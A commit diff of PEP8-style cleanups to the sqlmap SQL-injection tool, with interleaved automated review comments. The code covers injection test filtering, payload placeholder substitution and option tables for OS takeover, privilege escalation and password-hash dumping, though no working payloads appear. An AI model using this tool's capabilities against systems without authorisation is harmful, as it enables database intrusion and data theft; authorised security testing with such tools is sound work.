Some more PEPing (I hope that I haven't broke anything)

This commit is contained in:
Miroslav Stampar 2018-03-13 13:45:42 +01:00
parent 8166a4eeb8
commit fa4c1c5251
66 changed files with 1157 additions and 1288 deletions


@ -146,8 +146,7 @@ def checkSqlInjection(place, parameter, value):
# error message, simple heuristic check or via DBMS-specific # error message, simple heuristic check or via DBMS-specific
# payload), ask the user to limit the tests to the fingerprinted # payload), ask the user to limit the tests to the fingerprinted
# DBMS # DBMS
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \ if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]" msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else [] kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
@ -156,9 +155,7 @@ def checkSqlInjection(place, parameter, value):
# message, via simple heuristic check or via DBMS-specific # message, via simple heuristic check or via DBMS-specific
# payload), ask the user to extend the tests to all DBMS-specific, # payload), ask the user to extend the tests to all DBMS-specific,
# regardless of --level and --risk values provided # regardless of --level and --risk values provided
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \ if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
kb.heuristicDbms or injection.dbms):
msg = "for the remaining tests, do you want to include all tests " msg = "for the remaining tests, do you want to include all tests "
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "level (%d)" % conf.level if conf.level < 5 else "" msg += "level (%d)" % conf.level if conf.level < 5 else ""
@ -242,9 +239,7 @@ def checkSqlInjection(place, parameter, value):
# Skip tests if title, vector or DBMS is not included by the # Skip tests if title, vector or DBMS is not included by the
# given test filter # given test filter
if conf.testFilter and not any(conf.testFilter in str(item) or \ if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
re.search(conf.testFilter, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is not included by the given filter" debugMsg += "name/vector/DBMS is not included by the given filter"
logger.debug(debugMsg) logger.debug(debugMsg)
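Review bot: The joined condition `re.search(conf.testFilter, str(item), re.I)` still hands a user-supplied option straight to the regex engine on every test, so a malformed filter value raises `re.error` from inside the loop instead of producing a clear message; the same applies to `conf.testSkip` in the next hunk. Unless the option is validated when parsed (not visible here), wrapping the call in `try`/`except re.error` that reports the offending pattern, or compiling it once ahead of the loop, would close that gap and keep the reflowed line short. checkSqlInjection's body starts and ends outside this hunk.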
@ -252,9 +247,7 @@ def checkSqlInjection(place, parameter, value):
# Skip tests if title, vector or DBMS is included by the # Skip tests if title, vector or DBMS is included by the
# given skip filter # given skip filter
if conf.testSkip and any(conf.testSkip in str(item) or \ if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
re.search(conf.testSkip, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is included by the given skip filter" debugMsg += "name/vector/DBMS is included by the given skip filter"
logger.debug(debugMsg) logger.debug(debugMsg)
@ -588,10 +581,10 @@ def checkSqlInjection(place, parameter, value):
# body for the test's <grep> regular expression # body for the test's <grep> regular expression
try: try:
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False) page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \ output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) \ output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output: if output:
result = output == "1" result = output == "1"
@ -873,8 +866,7 @@ def checkFalsePositives(injection):
retVal = True retVal = True
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\ if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
pushValue(kb.injection) pushValue(kb.injection)
infoMsg = "checking if the injection point on %s " % injection.place infoMsg = "checking if the injection point on %s " % injection.place
@ -971,7 +963,7 @@ def checkFilteredChars(injection):
# inference techniques depend on character '>' # inference techniques depend on character '>'
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)): if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)): if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)):
warnMsg = "it appears that the character '>' is " warnMsg = "it appears that the character '>' is "
warnMsg += "filtered by the back-end server. You are strongly " warnMsg += "filtered by the back-end server. You are strongly "
warnMsg += "advised to rerun with the '--tamper=between'" warnMsg += "advised to rerun with the '--tamper=between'"


@ -406,8 +406,7 @@ def start():
if conf.nullConnection: if conf.nullConnection:
checkNullConnection() checkNullConnection()
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \ if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
and (kb.injection.place is None or kb.injection.parameter is None):
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
# NOTE: this is not needed anymore, leaving only to display # NOTE: this is not needed anymore, leaving only to display


@ -56,19 +56,19 @@ def setHandler():
""" """
items = [ items = [
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn), (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn), (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn), (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn), (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn), (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn), (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn), (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn), (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
] ]
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items) _ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
if _: if _:


@ -294,17 +294,21 @@ class Agent(object):
if payload is None: if payload is None:
return return
_ = ( replacements = (
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ ("[DELIMITER_START]", kb.chars.start),
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ ("[DELIMITER_STOP]", kb.chars.stop),
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) ("[AT_REPLACE]", kb.chars.at),
) ("[SPACE_REPLACE]", kb.chars.space),
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) ("[DOLLAR_REPLACE]", kb.chars.dollar),
("[HASH_REPLACE]", kb.chars.hash_),
("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
)
payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload)
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)): for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)):
payload = payload.replace(_, str(randomInt())) payload = payload.replace(_, str(randomInt()))
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
payload = payload.replace(_, randomStr()) payload = payload.replace(_, randomStr())
if origValue is not None and "[ORIGVALUE]" in payload: if origValue is not None and "[ORIGVALUE]" in payload:
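Review bot: The tuple is renamed from `_` to `replacements`, yet the two placeholder loops right after it still bind each match to `_`, a name that conventionally marks a discarded value even though it is read twice per iteration. `for placeholder in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)):` with `payload = payload.replace(placeholder, str(randomInt()))` (and the same for RANDSTR) would make the loops read like the rest of the rewritten block. The enclosing method starts before this hunk and continues past it.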
@ -928,7 +932,7 @@ class Agent(object):
limitedQuery += " %s" % limitStr limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
if not " ORDER BY " in limitedQuery: if " ORDER BY " not in limitedQuery:
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT") limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery: elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")] limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]


@ -6,9 +6,9 @@ See the file 'LICENSE' for copying permission
""" """
try: try:
import cPickle as pickle import cPickle as pickle
except: except:
import pickle import pickle
import bz2 import bz2
import itertools import itertools


@ -94,7 +94,7 @@ def base64unpickle(value, unsafe=False):
try: try:
retVal = loads(base64decode(value)) retVal = loads(base64decode(value))
except TypeError: except TypeError:
retVal = loads(base64decode(bytes(value))) retVal = loads(base64decode(bytes(value)))
return retVal return retVal


@ -8,20 +8,20 @@ See the file 'LICENSE' for copying permission
from lib.core.datatype import AttribDict from lib.core.datatype import AttribDict
_defaults = { _defaults = {
"csvDel": ',', "csvDel": ',',
"timeSec": 5, "timeSec": 5,
"googlePage": 1, "googlePage": 1,
"verbose": 1, "verbose": 1,
"delay": 0, "delay": 0,
"timeout": 30, "timeout": 30,
"retries": 3, "retries": 3,
"saFreq": 0, "saFreq": 0,
"threads": 1, "threads": 1,
"level": 1, "level": 1,
"risk": 1, "risk": 1,
"dumpFormat": "CSV", "dumpFormat": "CSV",
"tech": "BEUSTQ", "tech": "BEUSTQ",
"torType": "SOCKS5", "torType": "SOCKS5",
} }
defaults = AttribDict(_defaults) defaults = AttribDict(_defaults)


@ -208,54 +208,60 @@ FROM_DUMMY_TABLE = {
} }
SQL_STATEMENTS = { SQL_STATEMENTS = {
"SQL SELECT statement": ( "SQL SELECT statement": (
"select ", "select ",
"show ", "show ",
" top ", " top ",
" distinct ", " distinct ",
" from ", " from ",
" from dual", " from dual",
" where ", " where ",
" group by ", " group by ",
" order by ", " order by ",
" having ", " having ",
" limit ", " limit ",
" offset ", " offset ",
" union all ", " union all ",
" rownum as ", " rownum as ",
"(case ", ), "(case ",
),
"SQL data definition": ( "SQL data definition": (
"create ", "create ",
"declare ", "declare ",
"drop ", "drop ",
"truncate ", "truncate ",
"alter ", ), "alter ",
),
"SQL data manipulation": ( "SQL data manipulation": (
"bulk ", "bulk ",
"insert ", "insert ",
"update ", "update ",
"delete ", "delete ",
"merge ", "merge ",
"load ", ), "load ",
),
"SQL data control": ( "SQL data control": (
"grant ", "grant ",
"revoke ", ), "revoke ",
),
"SQL data execution": ( "SQL data execution": (
"exec ", "exec ",
"execute ", "execute ",
"values ", "values ",
"call ", ), "call ",
),
"SQL transaction": ( "SQL transaction": (
"start transaction ", "start transaction ",
"begin work ", "begin work ",
"begin transaction ", "begin transaction ",
"commit ", "commit ",
"rollback ", ), "rollback ",
),
} }
POST_HINT_CONTENT_TYPES = { POST_HINT_CONTENT_TYPES = {


@ -242,40 +242,40 @@ class REDIRECTION:
class PAYLOAD: class PAYLOAD:
SQLINJECTION = { SQLINJECTION = {
1: "boolean-based blind", 1: "boolean-based blind",
2: "error-based", 2: "error-based",
3: "inline query", 3: "inline query",
4: "stacked queries", 4: "stacked queries",
5: "AND/OR time-based blind", 5: "AND/OR time-based blind",
6: "UNION query", 6: "UNION query",
} }
PARAMETER = { PARAMETER = {
1: "Unescaped numeric", 1: "Unescaped numeric",
2: "Single quoted string", 2: "Single quoted string",
3: "LIKE single quoted string", 3: "LIKE single quoted string",
4: "Double quoted string", 4: "Double quoted string",
5: "LIKE double quoted string", 5: "LIKE double quoted string",
} }
RISK = { RISK = {
0: "No risk", 0: "No risk",
1: "Low risk", 1: "Low risk",
2: "Medium risk", 2: "Medium risk",
3: "High risk", 3: "High risk",
} }
CLAUSE = { CLAUSE = {
0: "Always", 0: "Always",
1: "WHERE", 1: "WHERE",
2: "GROUP BY", 2: "GROUP BY",
3: "ORDER BY", 3: "ORDER BY",
4: "LIMIT", 4: "LIMIT",
5: "OFFSET", 5: "OFFSET",
6: "TOP", 6: "TOP",
7: "Table name", 7: "Table name",
8: "Column name", 8: "Column name",
} }
class METHOD: class METHOD:
COMPARISON = "comparison" COMPARISON = "comparison"


@ -687,7 +687,7 @@ def _setMetasploit():
if IS_WIN: if IS_WIN:
try: try:
import win32file __import__("win32file")
except ImportError: except ImportError:
errMsg = "sqlmap requires third-party module 'pywin32' " errMsg = "sqlmap requires third-party module 'pywin32' "
errMsg += "in order to use Metasploit functionalities on " errMsg += "in order to use Metasploit functionalities on "
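Review bot: `__import__("win32file")` on the replaced line is an availability probe whose result is discarded, which reads like a stray statement without a comment explaining that the module itself is never used here; suggest `__import__("win32file")  # presence check for 'pywin32' only`. The same construct is introduced in profile() with `__import__("gobject")` in a later file section and would benefit from the same comment. _setMetasploit continues outside this hunk.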
@ -700,7 +700,7 @@ def _setMetasploit():
retVal = None retVal = None
try: try:
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
_ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
_ = OpenKey(_, key) _ = OpenKey(_, key)
retVal = QueryValueEx(_, value)[0] retVal = QueryValueEx(_, value)[0]
@ -2350,7 +2350,7 @@ def _checkWebSocket():
from websocket import ABNF from websocket import ABNF
except ImportError: except ImportError:
errMsg = "sqlmap requires third-party module 'websocket-client' " errMsg = "sqlmap requires third-party module 'websocket-client' "
errMsg += "in order to use WebSocket funcionality" errMsg += "in order to use WebSocket functionality"
raise SqlmapMissingDependence(errMsg) raise SqlmapMissingDependence(errMsg)
def _checkTor(): def _checkTor():


@ -6,250 +6,252 @@ See the file 'LICENSE' for copying permission
""" """
optDict = { optDict = {
# Format: # Family: {"parameter name": "parameter datatype"},
# Family: { "parameter name": "parameter datatype" }, # --OR--
# Or: # Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")},
# Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") },
"Target": {
"direct": "string",
"url": "string",
"logFile": "string",
"bulkFile": "string",
"requestFile": "string",
"sessionFile": "string",
"googleDork": "string",
"configFile": "string",
"sitemapUrl": "string",
},
"Request": { "Target": {
"method": "string", "direct": "string",
"data": "string", "url": "string",
"paramDel": "string", "logFile": "string",
"cookie": "string", "bulkFile": "string",
"cookieDel": "string", "requestFile": "string",
"loadCookies": "string", "sessionFile": "string",
"dropSetCookie": "boolean", "googleDork": "string",
"agent": "string", "configFile": "string",
"randomAgent": "boolean", "sitemapUrl": "string",
"host": "string", },
"referer": "string",
"headers": "string",
"authType": "string",
"authCred": "string",
"authFile": "string",
"ignoreCode": "integer",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
"ignoreTimeouts": "boolean",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
"tor": "boolean",
"torPort": "integer",
"torType": "string",
"checkTor": "boolean",
"delay": "float",
"timeout": "float",
"retries": "integer",
"rParam": "string",
"safeUrl": "string",
"safePost": "string",
"safeReqFile": "string",
"safeFreq": "integer",
"skipUrlEncode": "boolean",
"csrfToken": "string",
"csrfUrl": "string",
"forceSSL": "boolean",
"hpp": "boolean",
"evalCode": "string",
},
"Optimization": { "Request": {
"optimize": "boolean", "method": "string",
"predictOutput": "boolean", "data": "string",
"keepAlive": "boolean", "paramDel": "string",
"nullConnection": "boolean", "cookie": "string",
"threads": "integer", "cookieDel": "string",
}, "loadCookies": "string",
"dropSetCookie": "boolean",
"agent": "string",
"randomAgent": "boolean",
"host": "string",
"referer": "string",
"headers": "string",
"authType": "string",
"authCred": "string",
"authFile": "string",
"ignoreCode": "integer",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
"ignoreTimeouts": "boolean",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
"tor": "boolean",
"torPort": "integer",
"torType": "string",
"checkTor": "boolean",
"delay": "float",
"timeout": "float",
"retries": "integer",
"rParam": "string",
"safeUrl": "string",
"safePost": "string",
"safeReqFile": "string",
"safeFreq": "integer",
"skipUrlEncode": "boolean",
"csrfToken": "string",
"csrfUrl": "string",
"forceSSL": "boolean",
"hpp": "boolean",
"evalCode": "string",
},
"Injection": { "Optimization": {
"testParameter": "string", "optimize": "boolean",
"skip": "string", "predictOutput": "boolean",
"skipStatic": "boolean", "keepAlive": "boolean",
"paramExclude": "string", "nullConnection": "boolean",
"dbms": "string", "threads": "integer",
"dbmsCred": "string", },
"os": "string",
"invalidBignum": "boolean",
"invalidLogical": "boolean",
"invalidString": "boolean",
"noCast": "boolean",
"noEscape": "boolean",
"prefix": "string",
"suffix": "string",
"tamper": "string",
},
"Detection": { "Injection": {
"level": "integer", "testParameter": "string",
"risk": "integer", "skip": "string",
"string": "string", "skipStatic": "boolean",
"notString": "string", "paramExclude": "string",
"regexp": "string", "dbms": "string",
"code": "integer", "dbmsCred": "string",
"textOnly": "boolean", "os": "string",
"titles": "boolean", "invalidBignum": "boolean",
}, "invalidLogical": "boolean",
"invalidString": "boolean",
"noCast": "boolean",
"noEscape": "boolean",
"prefix": "string",
"suffix": "string",
"tamper": "string",
},
"Techniques": { "Detection": {
"tech": "string", "level": "integer",
"timeSec": "integer", "risk": "integer",
"uCols": "string", "string": "string",
"uChar": "string", "notString": "string",
"uFrom": "string", "regexp": "string",
"dnsDomain": "string", "code": "integer",
"secondOrder": "string", "textOnly": "boolean",
}, "titles": "boolean",
},
"Fingerprint": { "Techniques": {
"extensiveFp": "boolean", "tech": "string",
}, "timeSec": "integer",
"uCols": "string",
"uChar": "string",
"uFrom": "string",
"dnsDomain": "string",
"secondOrder": "string",
},
"Enumeration": { "Fingerprint": {
"getAll": "boolean", "extensiveFp": "boolean",
"getBanner": ("boolean", "Banners"), },
"getCurrentUser": ("boolean", "Users"),
"getCurrentDb": ("boolean", "Databases"),
"getHostname": "boolean",
"isDba": "boolean",
"getUsers": ("boolean", "Users"),
"getPasswordHashes": ("boolean", "Passwords"),
"getPrivileges": ("boolean", "Privileges"),
"getRoles": ("boolean", "Roles"),
"getDbs": ("boolean", "Databases"),
"getTables": ("boolean", "Tables"),
"getColumns": ("boolean", "Columns"),
"getSchema": "boolean",
"getCount": "boolean",
"dumpTable": "boolean",
"dumpAll": "boolean",
"search": "boolean",
"getComments": "boolean",
"db": "string",
"tbl": "string",
"col": "string",
"exclude": "string",
"pivotColumn": "string",
"dumpWhere": "string",
"user": "string",
"excludeSysDbs": "boolean",
"limitStart": "integer",
"limitStop": "integer",
"firstChar": "integer",
"lastChar": "integer",
"query": "string",
"sqlShell": "boolean",
"sqlFile": "string",
},
"Brute": { "Enumeration": {
"commonTables": "boolean", "getAll": "boolean",
"commonColumns": "boolean", "getBanner": ("boolean", "Banners"),
}, "getCurrentUser": ("boolean", "Users"),
"getCurrentDb": ("boolean", "Databases"),
"getHostname": "boolean",
"isDba": "boolean",
"getUsers": ("boolean", "Users"),
"getPasswordHashes": ("boolean", "Passwords"),
"getPrivileges": ("boolean", "Privileges"),
"getRoles": ("boolean", "Roles"),
"getDbs": ("boolean", "Databases"),
"getTables": ("boolean", "Tables"),
"getColumns": ("boolean", "Columns"),
"getSchema": "boolean",
"getCount": "boolean",
"dumpTable": "boolean",
"dumpAll": "boolean",
"search": "boolean",
"getComments": "boolean",
"db": "string",
"tbl": "string",
"col": "string",
"exclude": "string",
"pivotColumn": "string",
"dumpWhere": "string",
"user": "string",
"excludeSysDbs": "boolean",
"limitStart": "integer",
"limitStop": "integer",
"firstChar": "integer",
"lastChar": "integer",
"query": "string",
"sqlShell": "boolean",
"sqlFile": "string",
},
"User-defined function": { "Brute": {
"udfInject": "boolean", "commonTables": "boolean",
"shLib": "string", "commonColumns": "boolean",
}, },
"File system": { "User-defined function": {
"rFile": "string", "udfInject": "boolean",
"wFile": "string", "shLib": "string",
"dFile": "string", },
},
"Takeover": { "File system": {
"osCmd": "string", "rFile": "string",
"osShell": "boolean", "wFile": "string",
"osPwn": "boolean", "dFile": "string",
"osSmb": "boolean", },
"osBof": "boolean",
"privEsc": "boolean",
"msfPath": "string",
"tmpPath": "string",
},
"Windows": { "Takeover": {
"regRead": "boolean", "osCmd": "string",
"regAdd": "boolean", "osShell": "boolean",
"regDel": "boolean", "osPwn": "boolean",
"regKey": "string", "osSmb": "boolean",
"regVal": "string", "osBof": "boolean",
"regData": "string", "privEsc": "boolean",
"regType": "string", "msfPath": "string",
}, "tmpPath": "string",
},
"General": { "Windows": {
#"xmlFile": "string", "regRead": "boolean",
"trafficFile": "string", "regAdd": "boolean",
"batch": "boolean", "regDel": "boolean",
"binaryFields": "string", "regKey": "string",
"charset": "string", "regVal": "string",
"checkInternet": "boolean", "regData": "string",
"crawlDepth": "integer", "regType": "string",
"crawlExclude": "string", },
"csvDel": "string",
"dumpFormat": "string",
"encoding": "string",
"eta": "boolean",
"flushSession": "boolean",
"forms": "boolean",
"freshQueries": "boolean",
"harFile": "string",
"hexConvert": "boolean",
"outputDir": "string",
"parseErrors": "boolean",
"saveConfig": "string",
"scope": "string",
"testFilter": "string",
"testSkip": "string",
"updateAll": "boolean",
},
"Miscellaneous": { "General": {
"alert": "string", # "xmlFile": "string",
"answers": "string", "trafficFile": "string",
"beep": "boolean", "batch": "boolean",
"cleanup": "boolean", "binaryFields": "string",
"dependencies": "boolean", "charset": "string",
"disableColoring": "boolean", "checkInternet": "boolean",
"googlePage": "integer", "crawlDepth": "integer",
"identifyWaf": "boolean", "crawlExclude": "string",
"mobile": "boolean", "csvDel": "string",
"offline": "boolean", "dumpFormat": "string",
"purgeOutput": "boolean", "encoding": "string",
"skipWaf": "boolean", "eta": "boolean",
"smart": "boolean", "flushSession": "boolean",
"tmpDir": "string", "forms": "boolean",
"webRoot": "string", "freshQueries": "boolean",
"wizard": "boolean", "harFile": "string",
"verbose": "integer", "hexConvert": "boolean",
}, "outputDir": "string",
"Hidden": { "parseErrors": "boolean",
"dummy": "boolean", "saveConfig": "string",
"disablePrecon": "boolean", "scope": "string",
"profile": "boolean", "testFilter": "string",
"forceDns": "boolean", "testSkip": "string",
"murphyRate": "integer", "updateAll": "boolean",
"smokeTest": "boolean", },
"liveTest": "boolean",
"stopFail": "boolean", "Miscellaneous": {
"runCase": "string", "alert": "string",
}, "answers": "string",
"API": { "beep": "boolean",
"api": "boolean", "cleanup": "boolean",
"taskid": "string", "dependencies": "boolean",
"database": "string", "disableColoring": "boolean",
} "googlePage": "integer",
} "identifyWaf": "boolean",
"mobile": "boolean",
"offline": "boolean",
"purgeOutput": "boolean",
"skipWaf": "boolean",
"smart": "boolean",
"tmpDir": "string",
"webRoot": "string",
"wizard": "boolean",
"verbose": "integer",
},
"Hidden": {
"dummy": "boolean",
"disablePrecon": "boolean",
"profile": "boolean",
"forceDns": "boolean",
"murphyRate": "integer",
"smokeTest": "boolean",
"liveTest": "boolean",
"stopFail": "boolean",
"runCase": "string",
},
"API": {
"api": "boolean",
"taskid": "string",
"database": "string",
}
}


@ -20,9 +20,9 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
""" """
try: try:
__import__("gobject")
from thirdparty.gprof2dot import gprof2dot from thirdparty.gprof2dot import gprof2dot
from thirdparty.xdot import xdot from thirdparty.xdot import xdot
import gobject
import gtk import gtk
import pydot import pydot
except ImportError, e: except ImportError, e:


@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.2.3.22" VERSION = "1.2.3.23"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -224,7 +224,7 @@ PYVERSION = sys.version.split()[0]
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema")
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
